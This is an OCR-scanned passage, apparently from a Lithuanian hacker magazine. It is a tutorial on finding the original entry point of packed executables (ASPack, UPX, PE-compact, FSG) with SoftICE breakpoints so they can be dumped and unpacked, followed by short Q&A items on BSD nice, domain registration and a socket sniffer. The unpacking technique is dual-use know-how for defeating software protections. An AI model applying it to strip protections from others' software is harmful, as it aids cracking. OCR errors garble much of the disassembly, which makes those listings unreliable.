pakuotuvais suspaustą „Notepad“ bei įžymųjį derintuvą 
SoftlCE. 


[Gyvos programos turinys] Pais paprasčiausias lir pats populi- 
ariausias) kovos su pakuotuvais būdas — po išpakavimo gauti 
programos turinį (dump). Sulaukęs pagrindinio programos lango 
pasirodymo, hakeris gauna šios programos turini, transformuoda- 
mas jį į vykdomą bylą. Kartais toks būdas veikia, kartais — ne. 
Pabandykime išsiaiškinti, kodėl. Paimkime klasikinę programa 
Notepad iš NT sistemos ir pabandykime gauti jos turinį su vienu iš 
dviejų geriausių dumperių: Proc Dump arba Lord PE Deluxe. 
Procesas praeina sėkmingai, o sukurta byla net lyg ir pasileidžia, 
tačiau... ji pasirodo besanti nevisiškai darbinga: išnyko lan- 
go antraštė ir visi tekstiniai dialogų pranešimai! Jeigu mes 
nesugebėjome gauti Notepad turinio, tai su tikromis apsaugomis 
tikrai nesusidorosime. Pabandykime išsiaiškinti, kodėl. 

Tyrimas parodė, kad išnykusios tekstinės eilutės saugomos resursų 
sekcijoje ir todėl jos yra apdorojamos su funkcija LoadString. | IDA 
Pro užkrauname originalų notepad.exe ir surandame ciklą, kuris 
su funkcija LoadStringW nuskaito mums reikalingas eilutes („W“ 
rodo, kad mes susidūrėme su unicode eilutėmis). 

Aha, štai kur jis! Žvilgtelėkime į jį atidžiau. Galiu patikinti: čia yra 
ko išmokti: 


Gudai optimizuotas eilučių resusų skaitymo ciklas 
01004625h mat ebp, ds:LondSringiV 
į ep — rodyklė į LoadStingW! 


0100482Bh mov edi, offset olf 10080C0 
+ todyklė į resursų lentelę 

01004830h 

01004830h loc 1004830: 

01004830h mov e0x, [8di] 

; į EAX užkrauname eilinę rodyklę | ulD 
01004832h push ebx 

+ nBurktas (maksimals buleio ilgis) 
01004833h push esi 

+ IpBulks: (odyklė į butai) 

01004834h push duord pr [eo] 


+ parduodame funkjai išgastų ID 


01004836h push [osp-+ OCh- hlnstonce] 
; Alnstance 

0100483Ah call obp ; LoadStringW 
; iš resuso nuskailome eilinę elulę 
01004830h mo ex, [Edi] 

+ | EOX vžkraunome ią patį UID 
0100463Eh inc eax 

; nuskaitytos eilutės ilgi padidiname vienetu 
0100483Fh tmp e04, ehx 

; ilutė telpa į hularį? 

01004841h mov [eol, esi 


; Vietoje. senojo ID išsaugojame rodyklę 

; | bute (o daugiau neprireiks) 
01004843h leo esi, [Bsi-+ 002] 
; sekančios eilutės pazicja bufeyje 
01004846h jų shor loc 1004888 
; Išigu bules baigėsi — bėdo 
01004848h add edi, 4 

; pereiname prie: sekančio UD 
01004848h sub ebx, e0x 

; sumažiname  buferio oisvos vietos: kieki 
01004840h cmp edi, offset off 1008150 
; resursų lentelė pasibaigė? 


1 Lordpe deluxe 
veikiančio Notepad turinio gavimas 


010048531, il short Jac 1004830 
sukome ciklą, kol nepasibaigs resursai 


Išvertus šį kodą į lietuvių kalbą, jis skambėtų taip: „Notepad iš 
resursų lentelės ima eilinį eilutės identifikatorių, užkrauna eilutę, 
patalpina ją lokaliame buferyje, o gautą rodyklę išsaugo vietoje... 
paties identifikatoriaus, kuris jau nereikalingas!“. Tai klasikinis 
pakartotino atlaisvintų kintamųjų panaudojimo metodas, žinomas 
dar nuo pirmujų PDP laikų, jeigu ne anksčiau. O jūs vis keikiate 
„Microsoft“! Notepad kūrė gudrus hakeris, kuris rūpestingai skirstė 
resursus, kitaip tariant, atmintį. Mums tai visų pirma reiškia, kad 
gautas veikiančios programos turinys bus nepilnavertis. Vietoje 


TD 
| L knisa 
oyo vart to ave he dangas" 


= “|| a 


2/ Notepade 
normaliai veikiantis Notepad (viršuje) Ir tas pats Norepad gavus Jo turinį 
tekstinės eilutės 


išnyko visas 


realių eilučių identifikatorių resursų sekcijoje saugomos rodyklės į 
atmintį, kurios rodo į „kosmosą“! Juk pakartotinai paleidus Notepad 
pirmas listingas jau nesuveikia. 

Daugelyje programų sutinkamos štai tokios konstrukcijos: 


„apsauga“ nuo veikiančių programų turinio gavimo 


void "p=0; 
1/ globalus: kintamasis 
i (o) p = mallodBUFF SIZE); 


Akivaizdu, kad gavus programos turinį po to, kai ji apdoros eilutę su 
„If“, globalus kintamasis p saugos rodyklę, kurią jis „paveldėjo“ an- 
kstesnio programos paleidimo metu, tačiau kitą kartą šis atminties 
regionas nebus išskirtas, todėl programa arba nulūš, arba įsibraus 
į svetimus duomenis ir surengs ten tikrą sąmyšį! 
Suformuluokime pagrindinę taisyklę: programos turinį galima gauti 
tik įėjimo taške! Telieka išsiaiškinti, kaip aptikti šį įėjimo tašką. 
Universalus OEP paieškos pavyzdys 

Štai mes ir priėjome prie paties įdomiausio ir universaliausio 
OEP nustatymo būdo, kurį be viso kito dar lengva automatizuoti. 
Pakuotuvas (net jeigu jis nėra visiškai korektiškas) tiesiog privalo 
po išpakavimo atstatyti steką, t.y. į vietą sugrąžinti ESP registrą, 
kuriame bus saugomas pirminis sistemos pagal nutylėjimą 
sukonfigūruojamas struktūrinių išimčių filtras. Kai kurie pakuo- 
tuvai taip pat atstato ir registrus, tačiau tai daryti šiaip jau nėra 
būtina. 

Paimkime, pavyzdžiui, kad ir tą patį ASPack bei pažiūrėkime | jo 
pradžią: 


Įėjimo taškas į ASPack išpakuotuvo 


u p 
01010001 PUSHAD 
01010002 CALL 0101000A 
01010007 1MP 465E04F7 
0101000C PUSH EBP 
01010000 RET 


Puiku! Pati pirma komanda visus registrus išsaugo steke. Akivaizdu, 
Jog prieš pat valdymo perdavimą į OEP jie bus atstatyti su komanda 
POPA, kurios vykdymą labai lengva susekti sukūrus sustojimo tašką 
ties virš steko viršūnės esančiu dvigubu žodžiu „bpm esp - 4“. 
Rezultatas pranoksta visus lūkesčius: 


Valdymo perdavinas į OEP 
O10103AF POPAD 
; po Šios komandos pastodo deintuvas 


01010380 JNZ 010103BA 
01010382 MOV EAX00000001 
01010387 RET 0000 
0101038A P USH 1006420 

; Valdymo pardavimas į OEP 

0101038F RET 


Išpakavus programą, ASPack rūpestingai iš steko išgauna 
išsaugotus registrus, po ko pasileidžia derintuvas ir mes matome 
paprastą kodą, kuris valdymą į OEP perduoda klasikiniu būdu, su 
PUSH offset OEP/RET. Pradinio įėjimo taško paieška netruko nė 
dešimties sekundžių! Argi ne puiku? O dabar paimkime UPX ir 
patikrinkime, ar su juo taip pat pavyks šis mūsų triukas? Juk mes 
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norime sukurti universalų įrankį! 


| leda UPK 


PUSKAD 

uotojos išsaugo registrus 

MOV ES|,01000000 
6 LEA EDI,[E 
DOC PUSH EDI 


Štal ir vėl jis, mums pažįstamas PUSHAD, kuris steke išsaugo 
visus registrus ir po to juos atstato prieš pat valdymo perdavimą 
OER Sukomanduojame „bpm esp - 4“ ir išeiname iš derintuvo, 
kol jis dar nepasirodė. 


Teip UP perčuodo valdymą į OEP 
0101185E POPAD 
010185 JWP 01006420 


Štai tau Ir skirtumai! Valdymas perduodamas su komanda JMP 
1006420h, kur 1006420h — pradinis įėjimo taškas. Panašu, 
kad visi pakuotuvai veikia pagal vieną ir tą patį algoritmą, todėl su 
ais susidoroti turėtų būti lengva, tačiau neskubėkime. Paimkime 
PE-compact ir patikrinkime su juo. 


im os į bylą, supokuotų su PE-compad 


0100 MOV EAXO1011974 
0)001005 PUSH EAK 
01001006 PUSH DWORD PTR FS:[0] 


01001000 MOV FS:[0],ESP 

Prasti popieriai! PE-compact iš Viso neišsaugo jokių registru, 0 
PUSH EAX naudojamas tik norint sukurti savą struktūrinių išimčių 
apdorotuvą. Nepaisant to, steko rodyklė turėtų būti atstatyta 
užbaigus išpakavimą, iš ko išplaukia, kad sustojimo taškas ties 
„bpm esp - 4“ vis dėlto gali suveikti. 


tojimo taško ties esp-4 suveikimos 


FSAF78 PUSH DWORD PTR [EBX-+ 04] 
TTFSAF78 LEA EAX,[EBP-10] 
TIF8NFTE PUSH EAK 


Taip, čia akivaizdžiai ne tai, ko mums reikia (sprendžiant pagal E/P 
77F8AF78h, mes esame kažkur KERNEL32.DLL viduje, kuris steką 
naudoja gamybinio būtinumo reikmėms), spaudžiam <Ctr/-D>, 
nes mes Čia ilgiau pasilikti visai nenorim, 


Kur aš?! 

010119A6 PUSH E8P 
01011947 PUSH EBX 
010119A8 PUSH EO 
01011949 PUSH EDI 


Kitas derintuvo pasirodymas situacijos taip pat nepraskaidrina. 
Aišku tik viena: steke kartu su kitais registrais išsaugomas ir EBP 
registras. Spaudžiam <Ctr-D> ir judam toliau. 


Perėjimas į OEP 

U eip-1 

01011A35 POP EBP 

01011A36 MP EAX (01006420h) 


Oštai šį kartą mums pasisekė! Iš steko išgaunamas EBP registras, 0 
po to su komanda JMP EAX pereinama į OER Kol kas viskas klostosi 
gerai, tik tos kelios klaidinančios verčia stresuoti, Automatizavimo 
atžvilgiu tokia situacija kur kas sudėtingesnė: kompiuteris intuicija 
pasigirti tikrai negali. O juk mes kol kas dar tik smaginamės... Apie 
kovą su protektoriais dar nekalbama. 

Paimkime rimtesnį pakuotuvą FSG 2.0 by bart/xt (htip://xtreeme. 
prv.pl/, http://wwwv.wasm.ru/baixado.php?mode=toolėid=345) Ir 
pradėkime jį kankinti. 


Daug žadantis pakuotojo FSG įėjimo: taškas 


01000154 XCHG ESP [01018584] 
0100015A POPAD 

01000158 XCHG EAN,ESP 
0100015C PUSH EBP 
01000150 NOVSB 


Nusivili nuo pirmųjų komandų. FSG pakeičia ESP registro reikšmę, 
Ir nors po kurio laiko ji vėl atstatoma, ypatingo džiaugsmo tai netei- 


Overview navigator Scale: 1 pixel = 128 bytes; Range: 01001000-0101416B 


kia. Pakuotuvas labai intensywiai naudoja steką, todel sukurtas 
sustojimo taškas ties „bpm esp-4“ pateikia milijonus klaidingų 
variantų, daugelis kurių yra cikle. 


Alaidingus sustojimo taškų variantus geneivojančio kodo fragmentas 


(oo POP ESI 
010010 10050 
010016 XCHG EAX,EDI 
(00 LODSD 
010016 PUSH EAX 
00016 CALL [E8X-+-10] 


Būtina įvesti kokią nors papildomą sąlygą (laimė, Sof/CE pripažįsta 
sąlyginius sustojimo taškus!), kuri leistų automatiškai nusijoti 
klaidingus variantus arba bent jau jų dalį. Pagalvokim! Jeigu supa- 
kuotos programos paleidimo kodas prasideda nuo standartinio 
prologo, tokio, kaip PUSH EBP/MOV EBPESP tai sustojimo taškas 
„bpm esp4 if *(esp)= = EBP“ nusijos krūvą šlamšto, tačiau tuo 
pačiu jis suveiks su bet kokių standartiniu nulinio įdėjimo lygio 
prologu. Supakuotoje programoje prologas gali būti optimizuotas, 
kur nenaudojamas EBP registras. 

O štai kita idėja. Tarkim, kad valdymas į OEP perduodamas per 
PUSH offset OEP/RETN, tuomet steko viršūnėje atsidurs sugrįžimo 
adresas, ką vėl gi lengva suprogramuoti kuriant sąlyginį sustojimo 
tašką. Valdymas taip pat gali būti perduodamas su MOV EAX, 
offset OEP/JMP EAX. Tai lengva sukontroliuoti, tačiau mes bejėgiai 
prieš „tiesiogines“ komandas UMP offset OEP arba JMP [OEP]). 
Klaidingi sustojimo taškų suveikimai čia neišvengiami! Pabandyk 
pakariauti su FSG. Vieną akimirką jau atrodo, kad sprendimo nėra, 
tačiau viskas iš tiesų yra kiek kitaip! Visi man žinomi pakuotuvai 
ir žymioji protektorių dalis, nepageidaudami maišyti save su pa- 
kuojamos programos kodu, įkurdina save atskiroje sekcijoje (arba 
ne sekcijoje), kuri yra arba prieš supakuotą programą, arba po 
jos! Pakuotuvo kodas būna sukoncentruotas tam tikroje vienoje 
vietoje ir niekada nepersidengia su išpakuojamos programos kodu! 
Atrodytų, tai akivaizdus faktas. Kiek kartų mes pro jį praeidavome 
net nesusimąstydami, kad jis leidžia visiškai automatizuoti OEP 
paieškos procesą! Dar kartą pažiūrėkime į atminties žemėlapį: 


Dvi supakuotos programos sekcijos 

MAP32 

NOTEPAD-64 000! 0018:01001000 00010000 
CODE RW 

NOTEPAD-fsą 0002 0018:01011000 00008000 
CODE RW 


Mes matome dvi sekcijas, kurios priklauso 
supakuotai programai. Neaišku, kuri iš jų 
yra kodo, o kuri — duomenų sekcija, juo 
labiau, kad turėtų būti dar viena resursams 
Skirta sekcija, tačiau klastingasis pakuotuvas 
kažkaip jas sumaišė vieną su kita. Beje, paties 
pakuotuvo kodas, kaip mes jau matėme, yra 
sukoncentruotas 10001xxh adresų erdvėje, 
čia taip pat nėra atskiros sau sukurtos sekci- 
jos. Norėdami eliminuoti klaidingus derintuvo 
suveikimus, mes susikoncentruosime ties 
supakuotai programai priklausančių adresų 
diapazonu, t.y. nuo pirmos sekcijos pradžios 


iki paskutinės pabaigos, automatiškai kontroliuojant EIP registro 
reikšmę kiekvieną kartą suveikus sustojimo taškui. Šiuo atveju tai 
atrodo taip: 


„Mogiška“ seka, atvedanti mus iki OEP 


bpm esp-4 if eip >= 01001000 8R ep < (K1011000 

Neįtikėtina, tačiau po ilgo tylėjimo (o tai natūralu, nes išpakuotuvas 
labai intensyviai naudoja steką) derintuvas netikėtai pasirodo tie- 
siog prie OEP! Nuo čia prasideda išpakuotas pradinės programos 


kodas: 


01006420 PUSH EBP 
01004421 MOV EBPESP 
01006423 PUSH FF 
01006425 PUSH 1001888 
0100642A PUSH 1006500 
0100642F MOV EAX,E:[0] 
01006435 PUSH EAX 
01006436 MOV ES:[0], ESP 


Fantastika!!! O juk FSG yra toli gražu ne pats silpniausias pakuotu- 
vas — jį faktiškai galima būtų pavadinti protektoriumi. Tačiau OEP 
paieškos metodika visais atvejais yra ta pati. Išskiriame supakuotai 
programai priklausančias sekcijas ir jų ribose sukuriame sustojimo 
tašką ties esp-4. Net jeigu paleidimo kodas naudoja optimizuotą 
prologą, pirmasis registras sąlygos derintuvo suveikimą, Nieko bai- 
saus nenutiks, jeigu mes nepakliūsime į patį OEP kadangi surasti 
optimizuoto prologo pradžią galima ir automatiškai! 

Taip mes į savo rankas gauname galingą daugkartinio veikimo ginklą, 
kurį lengva realizuoti LordPE, IDA Pro įskiepio arba savarankiško 
įrankio pavidalu, apie kurį mes pakalbėsime ateityje. 

Pabaiga 

Štai ir išmokome surasti OEP Telieka visai nedaug — į diską 
išsaugoti programos turinį. Tiesa, čia ne viskas taip paprasta, kaip 
gali pasirodyti iš pradžių, nes daugelis pakuotuvų/protektorių tam vi- 
sokeriopai priešinasi. Kitame šio ciklo straipsnyje mes pamatysime, 
kaip realizuoti universalų dumperį, kuris išpakuoja (taip pat ir DLL) 
bei apeina pažangų dinaminio šifravimo mechanizmą, kuris žinomas. 
CopyMemll pavadinimu — tai toks variantas, kuomet visa programa 
užšifruota, o atskiri atminties puslapiai dešifruojami tiesiog prieš 
jų panaudojimą, o po to vėl užšifruojami. Taip pat mes paliesime 
importo lentelės atstatymo klausimą. Finale gausime neblogą 
universalų išpakuotuvą, kuris lenks visus konkurentus. 
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Kaip BSD sistemoje paleisti procesą su tam tikru 
prioritetu? 


BSD sistemoje prioriteto reikšmė nurodoma su sveiku 

skaičiumi nuo -20 iki +20, čia programos, paleistos su 

prioritetu -20, turi maksimalų prioritetą sistemoje, o tos, 

kurių prioritetas +20 — yra mažiausio prioritetiškumo 
procesai. Pagal nutylėjimą prioriteto reikšmė lygi nuliui. Tiksliau 
šnekant, jeigu vartotojas nesikreipia į nice, paleidžiamo 
proceso prioritetas bus paveldėtas iš tėvo, dažniausiai tai 
komandinė aplinka (sheli), kurios prioritetas paprastai yra 
nulinis. Paprastas vartotojas gali nurodyti tik aukštesnes (tei- 
giamas) prioriteto reikšmes, taip sumažindamas paleidžiamų 
procesų prioritetiškumą. Supervartotojas papildomai gali nuro- 
dyti neigiamas prioriteto reikšmes. Paprastas pavyzdys: 


4 nice 10 /us/oal/hackei pp 


Kaip tu tikriausiai supratai, taisyklė paprasta: kuo mažesnė 
nice reikšmė, tuo aukštesnis proceso prioritetas. Tačiau vertėtų 
prisiminti, jog dažnai neigiamos, žemiausios prioriteto reikšmės 
(nuo -17 iki -20) rezervuojamos sisteminiams procesams. 


Internete galima rasti labai daug pasiūlymų, tačiau 

visi jie susiję išskirtinai su tarptautinių domenų 

registracija. Pavyzdžiui, svetainėje www.ipowerweb. 

com už registraciją „com, „net, org, .us, biz, info 

zonose prašoma viso labo 2,95 JAV dolerio. Kiek 
daugiau — $4,95 — už savo paslaugas ima ww.netfirms.. 
com. Savotišką rekordą pasiekė www. gandi.net, kurie už 
vieną eurą tau užregistruos domeną „info zonoje. 


(O) Kur registruojami patys pigiausi domenai? 


(N 


PRIEŠ UŽDUODAMAS KLAUSIMĄ 
PAGALVOK! MAN NEVERTA SIŲSTI 
KLAUSIMŲ, VIENAIP AR KITAIP 
SUSIJUSIŲ SU HAKINIMU/KREKI- 
NIMU/FRYKINIMU — TAM SKIR- 
TAS „HACK-FAG“, TAIP PAT NEV- 
ERTA UŽDAVINĖTI AKIVAIZDŽIAI 
LAMERIŠKŲ KLAUSIMŲ, ATSAKY- 
MUS Į KURIUOS TURĖDAMAS BENT 
KIEK NORĖDAMAS GALI RASTI IR 
PATS. AŠ NE TELEPATAS, TODĖL 
KONKRETIZUOK KLAUSIMĄ IR 
ATSIŲSK KUO DAUGIAU INFORMA- 

CIJOS. 


Padėk. Man reikia sniferio, kuris veiktų soketų 
lygyje. Standartiniai WinPcap naudojantys sprendi- 


mai nesusidoroja su mano užduotimi, kadangi jie 

negali periminėti per OpenVPN tunelį perduodamų 
duomenų. Norėtųsi tiesiog išsirinkti konkrečią programą 
ir stebėti jos į aktyvumą. Apsieiti be OpenVPN 
negaliu — būtinai turiu šifruoti tinklo srautą ir išsaugoti 
anonimiškumą. 


Tu ieškai programos IP Sniffer (http://erwan.l.free.fr!) 
ji yra būtent tai, ko tau reikia. Šis įrankis yra ne šiaip 


sau sniferis — tai daugiafunkcinis sprendimas, kuris gali 

periminėti per pačius įvairiausius lygius perdavinėjamus 
duomenis: su WinPcap tvarkykle, soketuų lygyje bei NDIS 
specifikacijos lygyje. Nevardinsiu skaitlingų šios programos 
ypatybių, o iš karto tau pateiksiu paruoštą receptą. Programos 
meniu keliauk į „Tools -> WinSock Hook“. Pasirodys papil- 
domas sniferio langas, skirtas konkrečios tinklo programos 
aktyvumo perėmimui. Norint pradėti snifinimą, reikia nurodyti 
tau reikalingą programą — jeigu tu žinai proceso PID, tuomet 
pakanka jį įrašyti į Process ID lauką. Priešingu atveju tau prav- 
ers specialus vedlys, kuris iškviečiamas nuspaudus specialų 
šalia esantį mygtuką. Štai, tiesą sakant, ir viskas. Dabar bet 
koks su soketais susijęs programos aktyvumas bus vaizdžiai 
pateikiamas IP Sniffer'io lange. Čia tu galėsi pamatyti, kas, 
kur ir kokiu pavidalu perduodama. 
Analogišku funkcionalumu mus džiugina ir kitas galingas 
produktas Ultrasniff (www.msnmonitor.com/ultrasniff/). 
Deja, priešingai nei /P Sniffer, jis platinamas už pinigus. 
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